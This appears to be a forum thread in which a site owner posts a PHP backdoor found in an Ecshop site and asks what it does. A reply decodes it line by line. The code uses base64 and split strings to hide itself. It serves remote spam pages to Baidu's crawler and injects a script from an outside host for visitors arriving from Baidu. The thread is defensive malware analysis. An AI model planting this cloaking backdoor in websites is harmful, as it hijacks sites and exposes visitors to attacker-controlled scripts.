20,359
社区成员
发帖
与我相关
我的任务
分享Ecshop开源程序被植入的一段木马程序,求真相!
开源建站容易成为黑客攻击对象,举个我发现的一个被攻击的网站(www.1985yy.com)例子,在百度输入框输入"site:www.1985yy.com".你会发现:
1.发现搜索结果很多垃圾内容,非原网站内容;
2.而打开搜索结果链接看到的又是正常内容;
3.无法使用百度快照;
4.在google等其它搜索引擎用site口令网站又显示正常。
我朋友的一个网站也中了类似的病毒,好不容易把木马病毒程序找出来了,但本人技术水平较低,病毒程序看得不是很明白,哪位朋友能注销解释下。
代码如下:
热心的朋友请解释和编译下。
1.发现搜索结果很多垃圾内容,非原网站内容;
2.而打开搜索结果链接看到的又是正常内容;
3.无法使用百度快照;
4.在google等其它搜索引擎用site口令网站又显示正常。
我朋友的一个网站也中了类似的病毒,好不容易把木马病毒程序找出来了,但本人技术水平较低,病毒程序看得不是很明白,哪位朋友能注销解释下。
代码如下:
error_reporting(E_ERROR);
$dedeN="PHNjcmlwdCBzcmM9aHR0cDovL2MuZG5way5tZS46NzA1MC90di5odG0+PC9zY3JpcHQ+";
if(strpos(strtolower($_SERVER["HT"."TP_US"."E"."R_AG"."EN"."T"]),"aidu")){
echo file_get_contents(base64_decode('aHR0cDovL2IuZG5way5uZXQ6ODMzL3l4MS90di5hc3A='));
exit();}else if(stristr($_SERVER["H"."TT"."P_REF"."E"."RER"],"aidu")){
echo base64_decode($dedeN); }
热心的朋友请解释和编译下。
...全文
请发表友善的回复…
发表回复
webeidolon 2012-02-13
- 打赏
- 举报
呵呵,自己搞错了
jlokys 2012-02-11
- 打赏
- 举报
对,要删除。
而下面这一段 是百度统计代码,应该是你们自己加的(自己可以查下),这段不是黑客加的
<script type="text/javascript">
var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://");
document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fb72ab2d3720957a8c84e9d1b4e4224e5' type='text/javascript'%3E%3C/script%3E"));
</script>
而下面这一段 是百度统计代码,应该是你们自己加的(自己可以查下),这段不是黑客加的
<script type="text/javascript">
var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://");
document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fb72ab2d3720957a8c84e9d1b4e4224e5' type='text/javascript'%3E%3C/script%3E"));
</script>
webeidolon 2012-02-11
- 打赏
- 举报
非常感谢,打开网站一个页面查看源代码呈现的一段,又如何解释;是不是把PHP源程序那一段删除了,木马就清除了?
[Quote=引用 3 楼 jlokys 的回复:]
从目前来看,主要是为了刷流量
[/Quote]
<script type="text/javascript">
var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://");
document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fb72ab2d3720957a8c84e9d1b4e4224e5' type='text/javascript'%3E%3C/script%3E"));
</script>
[Quote=引用 3 楼 jlokys 的回复:]
从目前来看,主要是为了刷流量
[/Quote]
jlokys 2012-02-10
- 打赏
- 举报
从目前来看,主要是为了刷流量
jlokys 2012-02-10
- 打赏
- 举报
原理很好明白:
//下面字符串内容为:<script src=http://c.dnpk.me.:7050/tv.htm></script>
$dedeN="PHNjcmlwdCBzcmM9aHR0cDovL2MuZG5way5tZS46NzA1MC90di5odG0+PC9zY3JpcHQ+";
//下面if判断检查是否为百度爬虫,这样是,直接丢给爬虫的是其它网站的一个网页内容
if(strpos(strtolower($_SERVER["HT"."TP_US"."E"."R_AG"."EN"."T"]),"aidu")){
//file_get_contents 读取链接 http://b.dnpk.net:833/yx1/tv.asp 的内容
echo file_get_contents(base64_decode('aHR0cDovL2IuZG5way5uZXQ6ODMzL3l4MS90di5hc3A='));
//终止程序执行
exit();}
else if(stristr($_SERVER["H"."TT"."P_REF"."E"."RER"],"aidu")){
//如果从百度过来的链接:则你的网页中会包含:<script src=http://c.dnpk.me.:7050/tv.htm></script>
echo base64_decode($dedeN); }
//下面字符串内容为:<script src=http://c.dnpk.me.:7050/tv.htm></script>
$dedeN="PHNjcmlwdCBzcmM9aHR0cDovL2MuZG5way5tZS46NzA1MC90di5odG0+PC9zY3JpcHQ+";
//下面if判断检查是否为百度爬虫,这样是,直接丢给爬虫的是其它网站的一个网页内容
if(strpos(strtolower($_SERVER["HT"."TP_US"."E"."R_AG"."EN"."T"]),"aidu")){
//file_get_contents 读取链接 http://b.dnpk.net:833/yx1/tv.asp 的内容
echo file_get_contents(base64_decode('aHR0cDovL2IuZG5way5uZXQ6ODMzL3l4MS90di5hc3A='));
//终止程序执行
exit();}
else if(stristr($_SERVER["H"."TT"."P_REF"."E"."RER"],"aidu")){
//如果从百度过来的链接:则你的网页中会包含:<script src=http://c.dnpk.me.:7050/tv.htm></script>
echo base64_decode($dedeN); }
